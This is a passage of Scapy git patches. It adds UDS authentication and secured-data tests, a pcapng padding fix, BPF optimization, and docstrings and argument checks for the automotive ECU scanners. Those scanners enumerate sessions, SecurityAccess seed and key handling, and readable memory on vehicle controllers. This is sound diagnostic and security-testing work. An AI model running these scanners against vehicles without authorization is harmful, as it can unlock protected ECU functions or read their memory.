+ += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x6, returnValue=0x0, + algorithmIndicator=(b"\x03\x00\x05\xFF\x00" + + b"\x02\xFF\xFE\xBE\x34" + + b"\x56\x03\xFF\xEE\x20\x01" + ), + sessionKeyInfo=b"\xFE") +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x07\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE\x34\x56\x03\xFF" + + b"\xEE\x20\x01\x00\x01\xFF\x00\x01\xFF\x00\x02\xC0\xCA") +assert auth.service == 0x29 +assert auth.subFunction == 0x7 +assert auth.algorithmIndicator == (b"\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE" + + b"\x34\x56\x03\xFF\xEE\x20\x01") +assert auth.lengthOfProofOfOwnershipClient == 0x1 +assert auth.proofOfOwnershipClient == b"\xFF" +assert auth.lengthOfChallengeClient == 0x1 +assert auth.challengeClient == b"\xFF" +assert auth.lengthOfAdditionalParameter == 0x2 +assert auth.additionalParameter == b"\xC0\xCA" + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x7, + algorithmIndicator=(b"\x03\x00\x05\xFF\x00\x02" + + b"\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01"), + proofOfOwnershipClient=b"\xFF", + challengeClient=b"\xFF", + additionalParameter=b"\xC0\xCA") +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x07\x00\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE\x34\x56\x03" + + b"\xFF\xEE\x20\x01\x00\x02\xFE\x20\x00\x01\xFE") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x7 +assert authpr.returnValue == 0x0 +assert auth.algorithmIndicator == (b"\x03\x00\x05\xFF\x00\x02\xFF\xFE\xBE" + + b"\x34\x56\x03\xFF\xEE\x20\x01") +assert authpr.lengthOfProofOfOwnershipServer == 0x2 +assert authpr.proofOfOwnershipServer == b"\xFE\x20" +assert authpr.lengthOfSessionKeyInfo == 0x1 +assert authpr.sessionKeyInfo == b"\xFE" + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x7, returnValue=0x0, + algorithmIndicator=(b"\x03\x00\x05\xFF\x00" + + b"\x02\xFF\xFE\xBE\x34" + + b"\x56\x03\xFF\xEE\x20\x01" + ), + proofOfOwnershipServer=b"\xFE\x20", + sessionKeyInfo=b"\xFE") +assert bytes(authpr_build) == bytes(authpr) + += Check UDS_AUTH + +auth = UDS(b"\x29\x08") +assert auth.service == 0x29 +assert auth.subFunction == 0x8 + += Build UDS_AUTH + +auth_build = UDS()/UDS_AUTH(subFunction=0x8) +assert bytes(auth_build) == bytes(auth) + += Check UDS_AUTHPR + +authpr = UDS(b"\x69\x08\x00") +assert authpr.service == 0x69 +assert authpr.subFunction == 0x8 +assert authpr.returnValue == 0x0 + +assert authpr.answers(auth) + += Build UDS_AUTHPR + +authpr_build = UDS()/UDS_AUTHPR(subFunction=0x8) +assert bytes(authpr_build) == bytes(authpr) + = Check UDS_TP tp = UDS(b'\x3E\x01') @@ -285,15 +624,50 @@ assert atppr.timingParameterResponseRecord == b'coffee' = Check UDS_SDT -sdt = UDS(b'\x84coffee') +sdt = UDS(b'\x84\x80\x00\x01\x12\x34\x13\x37\x01coffee') assert sdt.service == 0x84 -assert sdt.securityDataRequestRecord == b'coffee' +assert sdt.requestMessage == 0x1 +assert sdt.preEstablishedKeyUsed == 0x0 +assert sdt.encryptedMessage == 0x0 +assert sdt.signedMessage == 0x0 +assert sdt.signedResponseRequested == 0x0 +assert sdt.signatureEncryptionCalculation == 0x1 +assert sdt.signatureLength == 0x1234 +assert sdt.antiReplayCounter == 0x1337 +assert sdt.internalMessageServiceRequestId == 0x1 +assert sdt.dataRecord == b'coffee' + += Build UDS_SDT + +sdt = UDS()/UDS_SDT(requestMessage=0x1, signatureEncryptionCalculation=0x1, + signatureLength=0x1234, antiReplayCounter=0x1337, + internalMessageServiceRequestId=0x1, dataRecord=b'coffee') +assert sdt.service == 0x84 +assert sdt.requestMessage == 0x1 +assert sdt.preEstablishedKeyUsed == 0x0 +assert sdt.encryptedMessage == 0x0 +assert sdt.signedMessage == 0x0 +assert sdt.signedResponseRequested == 0x0 +assert sdt.signatureEncryptionCalculation == 0x1 +assert sdt.signatureLength == 0x1234 +assert sdt.antiReplayCounter == 0x1337 +assert sdt.internalMessageServiceRequestId == 0x1 +assert sdt.dataRecord == b'coffee' = Check UDS_SDTPR -sdtpr = UDS(b'\xC4coffee') +sdtpr = UDS(b'\xC4\x04\x00\x01\x12\x34\x13\x37\x01coffee') assert sdtpr.service == 0xC4 -assert sdtpr.securityDataResponseRecord == b'coffee' +assert sdtpr.requestMessage == 0x0 +assert sdtpr.preEstablishedKeyUsed == 0x0 +assert sdtpr.encryptedMessage == 0x0 +assert sdtpr.signedMessage == 0x1 +assert sdtpr.signedResponseRequested == 0x0 +assert sdtpr.signatureEncryptionCalculation == 0x1 +assert sdtpr.signatureLength == 0x1234 +assert sdtpr.antiReplayCounter == 0x1337 +assert sdtpr.internalMessageServiceResponseId == 0x1 +assert sdtpr.dataRecord == b'coffee' assert sdtpr.answers(sdt) @@ -985,6 +1359,16 @@ assert rft.fileSizeParameterLength == 0x02 assert rft.fileSizeUnCompressed == b'\xc3\x50' assert rft.fileSizeCompressed == b'\x75\x30' += Build UDS_RFT + +rft_build = UDS()/UDS_RFT(modeOfOperation=0x1, + filePathAndName=(b'D:\\mapdata\\europe\\' + + b'germany1.yxz'), + compressionMethod=1, encryptingMethod=1, + fileSizeUnCompressed=b'\xc3\x50', + fileSizeCompressed=b'\x75\x30') +assert bytes(rft_build) == bytes(rft) + = Check UDS_RFTPR rftpr = UDS(b'\x78\x01\x02\xc3\x50\x11') @@ -997,6 +1381,12 @@ assert rftpr.encryptingMethod == 1 assert rftpr.answers(rft) += Build UDS_RFTPR +rftpr_build = UDS()/UDS_RFTPR(modeOfOperation=0x1, + maxNumberOfBlockLength=b'\xc3\x50', + compressionMethod=1, encryptingMethod=1) +assert bytes(rftpr_build) == bytes(rftpr) + = Check UDS_NRC nrc = UDS(b'\x7f\x22\x33') From 8a94cc421bc1355c15b91b4169e2011b6c256a63 Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Thu, 18 Nov 2021 15:11:58 +0100 Subject: [PATCH 0690/1632] Fix IDB padding computation --- scapy/utils.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scapy/utils.py b/scapy/utils.py index 3cca5779293..427a2c264a1 100644 --- a/scapy/utils.py +++ b/scapy/utils.py @@ -1624,7 +1624,7 @@ def _read_block_dsb(self, block, size): raise EOFError # Compute the secrets length including the padding - padded_secrets_length = secrets_length + (4 - secrets_length % 4) + padded_secrets_length = secrets_length + (-secrets_length) % 4 if len(block) < padded_secrets_length: warning("PcapNg: invalid DSB secrets length!") raise EOFError From 276678df0bead6aae1887df939b8754ee6c10dfd Mon Sep 17 00:00:00 2001 From: Guillaume Valadon Date: Fri, 19 Nov 2021 10:39:53 +0100 Subject: [PATCH 0691/1632] Retrieve the optimized BPF filter --- scapy/arch/common.py | 4 ++-- scapy/arch/libpcap.py | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/arch/common.py b/scapy/arch/common.py index b8155bdecec..995f3e223e5 100644 --- a/scapy/arch/common.py +++ b/scapy/arch/common.py @@ -137,7 +137,7 @@ def compile_filter(filter_exp, # type: str linktype = ARPHDR_ETHER if linktype is not None: ret = pcap_compile_nopcap( - MTU, linktype, ctypes.byref(bpf), bpf_filter, 0, -1 + MTU, linktype, ctypes.byref(bpf), bpf_filter, 1, -1 ) elif iface: err = create_string_buffer(PCAP_ERRBUF_SIZE) @@ -149,7 +149,7 @@ def compile_filter(filter_exp, # type: str if error: raise OSError(error) ret = pcap_compile( - pcap, ctypes.byref(bpf), bpf_filter, 0, -1 + pcap, ctypes.byref(bpf), bpf_filter, 1, -1 ) pcap_close(pcap) if ret == -1: diff --git a/scapy/arch/libpcap.py b/scapy/arch/libpcap.py index 98f80c32528..0d92143829c 100644 --- a/scapy/arch/libpcap.py +++ b/scapy/arch/libpcap.py @@ -293,7 +293,7 @@ def fileno(self): def setfilter(self, f): filter_exp = create_string_buffer(f.encode("utf8")) - if pcap_compile(self.pcap, byref(self.bpf_program), filter_exp, 0, -1) == -1: # noqa: E501 + if pcap_compile(self.pcap, byref(self.bpf_program), filter_exp, 1, -1) == -1: # noqa: E501 log_runtime.error("Could not compile filter expression %s", f) return False else: From b310496ac3d036dd1d8d0f7b0bc7bad24ac7b565 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 22 Nov 2021 15:49:35 +0100 Subject: [PATCH 0692/1632] Add more documentation for UDS_, GMLAN_, and OBD_Scanner ... execute functions. Additionally, fix some minor bugs and add an UnstableTestSocket for deeper testing. --- scapy/contrib/automotive/gm/gmlan_scanner.py | 98 +++++++++---- scapy/contrib/automotive/obd/scanner.py | 21 +++ .../automotive/scanner/configuration.py | 4 +- .../contrib/automotive/scanner/enumerator.py | 86 ++++++++++- scapy/contrib/automotive/scanner/executor.py | 11 ++ scapy/contrib/automotive/scanner/test_case.py | 19 +++ scapy/contrib/automotive/uds_scan.py | 133 +++++++++++++++++- scapy/tools/automotive/obdscanner.py | 2 +- test/contrib/automotive/ecu_am.uts | 1 + test/contrib/automotive/gm/scanner.uts | 2 +- test/contrib/automotive/obd/scanner.uts | 6 +- .../automotive/scanner/configuration.uts | 13 -- .../contrib/automotive/scanner/enumerator.uts | 39 +++-- .../automotive/scanner/uds_scanner.uts | 48 +++++-- test/testsocket.py | 28 +++- 15 files changed, 427 insertions(+), 84 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan_scanner.py b/scapy/contrib/automotive/gm/gmlan_scanner.py index 00042fad99b..cb199a4de48 100644 --- a/scapy/contrib/automotive/gm/gmlan_scanner.py +++ b/scapy/contrib/automotive/gm/gmlan_scanner.py @@ -198,8 +198,48 @@ def _get_table_entry_y(self, tup): return "InitiateDiagnosticOperation:" +class GMLAN_RDBIEnumerator(GMLAN_Enumerator): + _description = "Readable data identifier per state" + + def _get_initial_requests(self, **kwargs): + # type: (Any) -> Iterable[Packet] + scan_range = kwargs.pop("scan_range", range(0x100)) + return (GMLAN() / GMLAN_RDBI(dataIdentifier=x) for x in scan_range) + + @staticmethod + def print_information(resp): + # type: (Packet) -> str + load = bytes(resp)[2:] if len(resp) > 3 else b"No data available" + return "PR: %r" % ((load[:17] + b"...") if len(load) > 20 else load) + + def _get_table_entry_y(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return "0x%04x: %s" % (tup[1].dataIdentifier, + tup[1].sprintf("%GMLAN_RDBI.dataIdentifier%")) + + def _get_table_entry_z(self, tup): + # type: (_AutomotiveTestCaseScanResult) -> str + return self._get_label(tup[2], self.print_information) + + class GMLAN_WDBIEnumerator(GMLAN_Enumerator): _description = "Writeable data identifier per state" + _supported_kwargs = copy.copy(GMLAN_Enumerator._supported_kwargs) + _supported_kwargs.update({ + 'rdbi_enumerator': GMLAN_RDBIEnumerator + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param rdbi_enumerator: Specifies an instance of a GMLAN_RDBIEnumerator + which is used to extract possible data + identifiers. + :type rdbi_enumerator: GMLAN_RDBIEnumerator""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(GMLAN_WDBIEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -242,6 +282,21 @@ def __init__(self): class GMLAN_SAEnumerator(GMLAN_Enumerator, StateGenerator): _description = "SecurityAccess supported" _transition_function_args = dict() # type: Dict[_Edge, Tuple[int, Optional[Callable[[int], int]]]] # noqa: E501 + _supported_kwargs = copy.copy(GMLAN_Enumerator._supported_kwargs) + _supported_kwargs.update({ + 'keyfunction': None + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param keyfunction: Specifies a function to generate the key from a + given seed. + :type keyfunction: Callable[[int], int]""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(GMLAN_SAEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -483,30 +538,6 @@ def _get_table_entry_y(self, tup): return "ProgrammingMode:" -class GMLAN_RDBIEnumerator(GMLAN_Enumerator): - _description = "Readable data identifier per state" - - def _get_initial_requests(self, **kwargs): - # type: (Any) -> Iterable[Packet] - scan_range = kwargs.pop("scan_range", range(0x100)) - return (GMLAN() / GMLAN_RDBI(dataIdentifier=x) for x in scan_range) - - @staticmethod - def print_information(resp): - # type: (Packet) -> str - load = bytes(resp)[2:] if len(resp) > 3 else b"No data available" - return "PR: %r" % ((load[:17] + b"...") if len(load) > 20 else load) - - def _get_table_entry_y(self, tup): - # type: (_AutomotiveTestCaseScanResult) -> str - return "0x%04x: %s" % (tup[1].dataIdentifier, - tup[1].sprintf("%GMLAN_RDBI.dataIdentifier%")) - - def _get_table_entry_z(self, tup): - # type: (_AutomotiveTestCaseScanResult) -> str - return self._get_label(tup[2], self.print_information) - - class GMLAN_RDBPIEnumerator(GMLAN_Enumerator): _description = "Readable parameter identifier per state" @@ -529,6 +560,25 @@ def _get_table_entry_z(self, tup): class GMLAN_RMBAEnumerator(GMLAN_Enumerator): _description = "Readable Memory Addresses and negative response per state" + _supported_kwargs = copy.copy(GMLAN_Enumerator._supported_kwargs) + _supported_kwargs.update({ + 'probe_width': int, + 'random_probes_len': int, + 'sequential_probes_len': int + }) + + _supported_kwargs_doc = GMLAN_Enumerator._supported_kwargs_doc + """ + :param int probe_width: Memory size of a probe. + :param int random_probes_len: Number of probes. + :param int sequential_probes_len: Size of a memory block during + sequential probing.""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(GMLAN_RMBAEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc + def __init__(self): # type: () -> None super(GMLAN_RMBAEnumerator, self).__init__() diff --git a/scapy/contrib/automotive/obd/scanner.py b/scapy/contrib/automotive/obd/scanner.py index cf30d745273..345c69c8f6e 100644 --- a/scapy/contrib/automotive/obd/scanner.py +++ b/scapy/contrib/automotive/obd/scanner.py @@ -8,6 +8,8 @@ # scapy.contrib.description = OnBoardDiagnosticScanner # scapy.contrib.status = loads +import copy + from scapy.compat import List, Type, Any, Iterable from scapy.contrib.automotive.obd.obd import OBD, OBD_S03, OBD_S07, OBD_S0A, \ OBD_S01, OBD_S06, OBD_S08, OBD_S09, OBD_NR, OBD_S02, OBD_S02_Record @@ -25,6 +27,17 @@ class OBD_Enumerator(ServiceEnumerator): + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'full_scan': bool, + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param bool full_scan: Specifies if the entire scan range is tested, or + if the bitmask with supported identifiers is + queried and only supported identifiers + are scanned.""" + @staticmethod def _get_negative_response_code(resp): # type: (Packet) -> int @@ -47,6 +60,10 @@ def filtered_results(self): class OBD_Service_Enumerator(OBD_Enumerator): + """ + Base class for OBD_Service_Enumerators + """ + def get_supported(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> List[int] super(OBD_Service_Enumerator, self).execute( @@ -75,6 +92,8 @@ def execute(self, socket, state, **kwargs): super(OBD_Service_Enumerator, self).execute( socket, state, scan_range=supported_pids, **kwargs) + execute.__doc__ = OBD_Enumerator._supported_kwargs_doc + @staticmethod def print_payload(resp): # type: (Packet) -> str @@ -145,6 +164,8 @@ def _get_table_entry_x(self, tup): class OBD_S01_Enumerator(OBD_Service_Enumerator): + """OBD_S01_Enumerator""" + _description = "Available data in OBD service 01" def _get_initial_requests(self, **kwargs): diff --git a/scapy/contrib/automotive/scanner/configuration.py b/scapy/contrib/automotive/scanner/configuration.py index 1cf3146dfa9..8fff6965f43 100644 --- a/scapy/contrib/automotive/scanner/configuration.py +++ b/scapy/contrib/automotive/scanner/configuration.py @@ -22,7 +22,6 @@ class AutomotiveTestCaseExecutorConfiguration(object): The following keywords are used in the AutomotiveTestCaseExecutor: verbose: Enables verbose output and logging debug: Will raise Exceptions on internal errors - delay_state_change: After a state change, a defined time is waited :param test_cases: List of AutomotiveTestCase classes or instances. Classes will get instantiated in this initializer. @@ -66,6 +65,8 @@ def _generate_test_case_config(self, test_case_cls): # apply global config val = self.__getattribute__(test_case_cls.__name__) for kwargs_key, kwargs_val in self.global_kwargs.items(): + if "_kwargs" in kwargs_key: + continue if kwargs_key not in val.keys(): val[kwargs_key] = kwargs_val self.__setattr__(test_case_cls.__name__, val) @@ -103,7 +104,6 @@ def __init__(self, test_cases, **kwargs): # type: (Union[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]], List[Type[AutomotiveTestCaseABC]]], Any) -> None # noqa: E501 self.verbose = kwargs.get("verbose", False) self.debug = kwargs.get("debug", False) - self.delay_state_change = kwargs.get("delay_state_change", 0.5) self.unittest = kwargs.pop("unittest", False) self.state_graph = Graph() self.test_cases = list() # type: List[AutomotiveTestCaseABC] diff --git a/scapy/contrib/automotive/scanner/enumerator.py b/scapy/contrib/automotive/scanner/enumerator.py index 9cc362b3f16..f0cc213f441 100644 --- a/scapy/contrib/automotive/scanner/enumerator.py +++ b/scapy/contrib/automotive/scanner/enumerator.py @@ -9,6 +9,7 @@ import abc import time +import copy from collections import defaultdict, OrderedDict from itertools import chain @@ -46,7 +47,61 @@ @six.add_metaclass(abc.ABCMeta) class ServiceEnumerator(AutomotiveTestCase): - """ Base class for ServiceEnumerators of automotive diagnostic protocols""" + """ + Base class for ServiceEnumerators of automotive diagnostic protocols + """ + + _supported_kwargs = copy.copy(AutomotiveTestCase._supported_kwargs) + _supported_kwargs.update({ + 'timeout': (int, float), + 'execution_time': int, + 'state_allow_list': (list, EcuState), + 'state_block_list': (list, EcuState), + 'retry_if_none_received': bool, + 'exit_if_no_answer_received': bool, + 'exit_if_service_not_supported': bool, + 'exit_scan_on_first_negative_response': bool, + 'retry_if_busy_returncode': bool, + 'debug': bool, + 'scan_range': (list, tuple, range) + }) + + _supported_kwargs_doc = AutomotiveTestCase._supported_kwargs_doc + """ + :param timeout: Timeout until a response will arrive after a request + :type timeout: integer or float + :param int execution_time: Time in seconds until the execution of + this enumerator is stopped. + :param state_allow_list: List of EcuState objects or EcuState object + in which the the execution of this enumerator + is allowed. If provided, other states will not + be executed. + :type state_allow_list: EcuState or list + :param state_block_list: List of EcuState objects or EcuState object + in which the the execution of this enumerator + is blocked. + :type state_block_list: EcuState or list + :param bool retry_if_none_received: Specifies if a request will be send + again, if None was received + (usually because of a timeout). + :param bool exit_if_no_answer_received: Specifies to finish the + execution of this enumerator + once None is received. + :param bool exit_if_service_not_supported: Specifies to finish the + execution of this + enumerator, once the + negative return code + 'serviceNotSupported' is + received. + :param bool exit_scan_on_first_negative_response: Specifies to finish + the execution once a + negative response is + received. + :param bool retry_if_busy_returncode: Specifies to retry a request, if + the 'busyRepeatRequest' negative + response code is received. + :param bool debug: Enables debug functions during execute. + :param scan_range: Specifies the identifiers to be scanned. + :type scan_range: list or tuple or range or iterable""" def __init__(self): # type: () -> None @@ -154,8 +209,10 @@ def __get_retry_iterator(self, state): if retry_entry is None: return [] elif isinstance(retry_entry, Packet): + log_interactive.debug("[i] Provide retry packet") return [retry_entry] else: + log_interactive.debug("[i] Provide retry iterator") # assume self.retry_pkt is a generator or list return retry_entry @@ -174,9 +231,25 @@ def __get_request_iterator(self, state, **kwargs): def execute(self, socket, state, **kwargs): # type: (_SocketUnion, EcuState, Any) -> None + self.check_kwargs(kwargs) timeout = kwargs.pop('timeout', 1) execution_time = kwargs.pop("execution_time", 1200) + state_block_list = kwargs.get('state_block_list', list()) + + if state_block_list and state in state_block_list: + self._state_completed[state] = True + log_interactive.debug("[i] State %s in block list!", repr(state)) + return + + state_allow_list = kwargs.get('state_allow_list', list()) + + if state_allow_list and state not in state_allow_list: + self._state_completed[state] = True + log_interactive.debug("[i] State %s not in allow list!", + repr(state)) + return + it = self.__get_request_iterator(state, **kwargs) # log_interactive.debug("[i] Using iterator %s in state %s", it, state) @@ -189,16 +262,15 @@ def execute(self, socket, state, **kwargs): try: res = socket.sr1(req, timeout=timeout, verbose=False) except (OSError, ValueError, Scapy_Exception) as e: - if self._retry_pkt[state] is None: - log_interactive.debug( - "[-] Exception '%s' in execute. Prepare for retry", e) - self._retry_pkt[state] = req - else: + if not self._populate_retry(state, req): log_interactive.critical( "[-] Exception during retry. This is bad") raise e if socket.closed: + if not self._populate_retry(state, req): + log_interactive.critical( + "[-] Socket closed during retry. This is bad") log_interactive.critical("[-] Socket closed during scan.") raise Scapy_Exception("Socket closed during scan") @@ -220,6 +292,8 @@ def execute(self, socket, state, **kwargs): log_interactive.debug("[i] States completed %s", repr(self._state_completed)) + execute.__doc__ = _supported_kwargs_doc + def _evaluate_response(self, state, # type: EcuState request, # type: Packet diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index c94c955e6eb..00bacb14e28 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -31,6 +31,16 @@ class AutomotiveTestCaseExecutor: Base class for different automotive scanners. This class handles the connection to a scan target, ensures the execution of all it's test cases, and stores the system state machine + + + :param socket: A socket object to communicate with the scan target + :param reset_handler: A function to reset the scan target + :param reconnect_handler: In case the communication needs to be + established after a reset, provide a + reconnect function which returns a socket object + :param test_cases: A list of TestCase instances or classes + :param kwargs: Arguments for the internal + AutomotiveTestCaseExecutorConfiguration instance """ @property def __initial_ecu_state(self): @@ -45,6 +55,7 @@ def __init__( test_cases=None, # type: Optional[List[Union[AutomotiveTestCaseABC, Type[AutomotiveTestCaseABC]]]] # noqa: E501 **kwargs # type: Optional[Dict[str, Any]] ): # type: (...) -> None + # The TesterPresentSender can interfere with a test_case, since a # target may only allow one request at a time. # The SingleConversationSocket prevents interleaving requests. diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index 522941753f4..cc3adc1e97a 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -17,6 +17,7 @@ from scapy.supersocket import SuperSocket from scapy.contrib.automotive.scanner.graph import _Edge from scapy.contrib.automotive.ecu import EcuState, EcuResponse +from scapy.error import Scapy_Exception if TYPE_CHECKING: @@ -41,6 +42,10 @@ class AutomotiveTestCaseABC: manipulates a device under test (DUT), to enter a certain state. In this state, the TestCase object gets executed. """ + + _supported_kwargs = {} # type: Dict[str, Any] + _supported_kwargs_doc = "" + @abc.abstractmethod def has_completed(self, state): # type: (EcuState) -> bool @@ -137,6 +142,8 @@ class AutomotiveTestCase(AutomotiveTestCaseABC): """ Base class for TestCases""" _description = "AutomotiveTestCase" + _supported_kwargs = AutomotiveTestCaseABC._supported_kwargs + _supported_kwargs_doc = AutomotiveTestCaseABC._supported_kwargs_doc def __init__(self): # type: () -> None @@ -146,6 +153,18 @@ def has_completed(self, state): # type: (EcuState) -> bool return self._state_completed[state] + @classmethod + def check_kwargs(cls, kwargs): + # type: (Dict[str, Any]) -> None + for k, v in kwargs.items(): + if k not in cls._supported_kwargs.keys(): + raise Scapy_Exception("Keyword-Argument %s not supported" % k) + ti = cls._supported_kwargs[k] + if ti is not None and not isinstance(v, ti): + raise Scapy_Exception( + "Keyword-Value '%s' is not instance of type %s" % + (k, str(ti))) + @property def completed(self): # type: () -> bool diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index a7600cadee9..27335177467 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -79,6 +79,27 @@ def _get_negative_response_label(response): class UDS_DSCEnumerator(UDS_Enumerator, StateGeneratingServiceEnumerator): _description = "Available sessions" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'delay_state_change': int, + 'overwrite_timeout': bool + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param int delay_state_change: Specifies an additional delay after + after a session is modified from + the transition function. In unit-test + scenarios, this delay should be set to + zero. + :param bool overwrite_timeout: True by default. This enumerator + overwrites the timeout argument, since + most ECUs take some time until a session + is changed. This ensures that more + results are gathered by default. In + unit-test scenarios, this value should + be set to False, in order to use the + timeout specified by the 'timeout' + argument.""" def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -99,6 +120,8 @@ def execute(self, socket, state, **kwargs): super(UDS_DSCEnumerator, self).execute(socket, state, **kwargs) + execute.__doc__ = _supported_kwargs_doc + def _get_table_entry_y(self, tup): # type: (_AutomotiveTestCaseScanResult) -> str return "0x%02x: %s" % ( @@ -256,8 +279,11 @@ class UDS_ServiceEnumerator(UDS_Enumerator): def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] - # Only generate services with unset positive response bit (0x40) - return (UDS(service=x) for x in range(0x100) if not x & 0x40) + # Only generate services with unset positive response bit (0x40) as + # default scan_range + scan_range = kwargs.pop("scan_range", + (x for x in range(0x100) if not x & 0x40)) + return (UDS(service=x) for x in scan_range) def _evaluate_response(self, state, # type: EcuState @@ -335,7 +361,7 @@ def points_to_blocks(pois): for identifier in pois)) if pr_in_block: generators.append(range(start, end)) - scan_range = itertools.chain.from_iterable(generators) + scan_range = list(itertools.chain.from_iterable(generators)) return scan_range def __init__(self): @@ -389,6 +415,22 @@ def _get_initial_requests(self, **kwargs): class UDS_WDBIEnumerator(UDS_Enumerator): _description = "Writeable data identifier per state" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'rdbi_enumerator': UDS_RDBIEnumerator + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param rdbi_enumerator: Specifies an instance of an UDS_RDBIEnumerator + which is used to extract possible data + identifiers. + :type rdbi_enumerator: UDS_RDBIEnumerator""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(UDS_WDBIEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -454,7 +496,8 @@ def pre_execute(self, socket, state, global_configuration): # this is a retry execute. Wait much longer than usual because # a required time delay not expired could have been received # on the previous attempt - time.sleep(11) + if not global_configuration.unittest: + time.sleep(11) def _evaluate_retry(self, state, # type: EcuState @@ -580,6 +623,9 @@ def get_security_access(sock, level=1, seed_pkt=None): if not seed_pkt: return False + if not any(seed_pkt.securitySeed): + return False + key_pkt = UDS_SA_XOR_Enumerator.get_key_pkt(seed_pkt, level) if key_pkt is None: return False @@ -634,6 +680,15 @@ def get_transition_function(self, socket, edge): class UDS_RCEnumerator(UDS_Enumerator): _description = "Available RoutineControls and negative response per state" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'type_list': list + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param list type_list: A list of RoutineControlTypes which should + be enumerated. Possible values = [1, 2, 3]. + """ def _get_initial_requests(self, **kwargs): # type: (Any) -> Iterable[Packet] @@ -775,6 +830,21 @@ def _get_table_entry_z(self, tup): class UDS_RMBARandomEnumerator(UDS_RMBAEnumeratorABC): + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'unittest': bool + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param bool unittest: Enables smaller search space for unit-test + scenarios. This safes execution time.""" + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(UDS_RMBARandomEnumerator, self).execute(socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc + @staticmethod def _random_memory_addr_pkt(addr_len=None, size_len=None, size=None): # type: (Optional[int], Optional[int], Optional[int]) -> Packet @@ -803,6 +873,23 @@ def _get_initial_requests(self, **kwargs): class UDS_RMBASequentialEnumerator(UDS_RMBAEnumeratorABC): + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'points_of_interest': list + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param list points_of_interest: A list of _PointOfInterest objects as + starting points for sequential search. + """ + + def execute(self, socket, state, **kwargs): + # type: (_SocketUnion, EcuState, Any) -> None + super(UDS_RMBASequentialEnumerator, self).execute( + socket, state, **kwargs) + + execute.__doc__ = _supported_kwargs_doc + def __init__(self): # type: () -> None super(UDS_RMBASequentialEnumerator, self).__init__() @@ -895,6 +982,8 @@ def pre_execute(self, socket, state, global_configuration): self._state_completed[state] = False self._request_iterators[state] = new_requests self.__points_of_interest[state] = list() + else: + self._request_iterators[state] = list() def _evaluate_response(self, state, # type: EcuState @@ -961,6 +1050,20 @@ def __init__(self): class UDS_RDEnumerator(UDS_Enumerator): _description = "RequestDownload supported" + _supported_kwargs = copy.copy(ServiceEnumerator._supported_kwargs) + _supported_kwargs.update({ + 'unittest': bool + }) + + _supported_kwargs_doc = ServiceEnumerator._supported_kwargs_doc + """ + :param bool unittest: 